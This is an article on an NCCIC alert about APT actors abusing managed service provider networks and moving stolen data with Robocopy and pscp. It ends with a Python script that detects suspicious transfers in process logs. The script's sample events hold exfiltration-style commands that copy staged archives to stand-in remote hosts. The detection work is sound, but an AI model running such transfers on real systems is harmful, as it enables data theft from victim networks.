Advanced persistent threats (APTs) are targeting IT service provider customers for cyber espionage and intellectual property theft against US critical infrastructure sectors
Advanced persistent threat (APT) actors are actively exploiting trust relationships in information technology (IT) service provider networks around the world, according to an alert published by the National Cybersecurity and Communications Integration Center (NCCIC). APTs have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing. Their techniques include using legitimate credentials, trusted off-the-shelf applications, and pre-installed system tools present in managed service provider (MSP) customer networks. Pre-installed system tools, such as command line scripts, are very common and are used by system administrators for legitimate processes. Because these scripts are legitimate tools, they often cannot simply be blocked, so APT actors can use them and remain undetected on victim networks.
APTs are using tools such as Robocopy and the PuTTY Secure Copy Client in their cyber warfare operations
APTs have been observed using Robocopy, a Microsoft command line tool, to transfer exfiltrated and archived data from MSP client networks back through MSP network environments. Additionally, APT actors have been observed using legitimate PuTTY Secure Copy Client (pscp) functions, allowing them to transfer stolen data securely and directly to third-party systems. A successful network intrusion can have a severe impact on the affected organization, particularly if the compromise becomes public. Possible impacts include temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses to restore systems and files, and potential harm to the organization’s reputation. To counter these malicious actors, US-CERT has published suggestions for the best response to and mitigation of their cyber attacks.
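Because Robocopy and pscp are legitimate tools that cannot simply be blocked, detection has to look at how they are used rather than whether they run at all. The following is an added example (not code from the original alert) that scans process-creation records for Robocopy writes to UNC hosts outside a known backup allowlist and for pscp uploads to remote hosts; the record format, field names, hostnames and addresses are all constructed for illustration.

```python
import re

# Constructed sample process-creation records (not from the original page),
# in a simplified "key=value|key=value" shape; the field names are assumptions.
SAMPLE_EVENTS = [
    "host=msp-jump01|user=svc_backup|image=C:\\Windows\\System32\\Robocopy.exe|cmd=robocopy D:\\archive \\\\backup01\\share\\daily /E",
    "host=msp-jump01|user=svc_backup|image=C:\\Windows\\System32\\Robocopy.exe|cmd=robocopy C:\\Users\\Public\\staging \\\\203.0.113.7\\c$\\out /E /Z",
    "host=client-ws12|user=jdoe|image=C:\\Tools\\pscp.exe|cmd=pscp.exe -pw ***** C:\\staging\\docs.7z deploy@198.51.100.20:/tmp/",
    "host=client-ws12|user=jdoe|image=C:\\Windows\\System32\\notepad.exe|cmd=notepad.exe notes.txt",
]

# Hosts that the organisation's own backup jobs are known to write to (assumed allowlist).
KNOWN_DESTINATIONS = {"backup01"}

UNC_RE = re.compile(r"\\\\([^\\\s]+)\\")        # matches \\host\share, captures host
SCP_TARGET_RE = re.compile(r"\S+@([^:\s]+):")   # matches user@host:path, captures host

def parse_event(line):
    """Split one 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event):
    """Return a finding string for a suspicious transfer, or None if benign."""
    image = event["image"].lower()
    cmd = event["cmd"]
    if image.endswith("robocopy.exe"):
        # Robocopy is expected; Robocopy to a UNC host outside the allowlist is not.
        for host in UNC_RE.findall(cmd):
            if host.lower() not in KNOWN_DESTINATIONS:
                return f"robocopy to unexpected host {host} by {event['user']} on {event['host']}"
    elif image.endswith("pscp.exe"):
        # Any pscp upload from a workstation to a remote host is worth a look.
        match = SCP_TARGET_RE.search(cmd)
        if match:
            return f"pscp upload to {match.group(1)} by {event['user']} on {event['host']}"
    return None

def flag_suspicious_transfers(lines):
    """Run the classifier over every record and collect the findings."""
    findings = []
    for line in lines:
        result = classify(parse_event(line))
        if result:
            findings.append(result)
    return findings

if __name__ == "__main__":
    for finding in flag_suspicious_transfers(SAMPLE_EVENTS):
        print(finding)
```

In a real deployment the allowlist would come from the backup configuration and the records from Sysmon or EDR process telemetry; the point is that context (destination host, originating user and machine) separates administrative use from exfiltration.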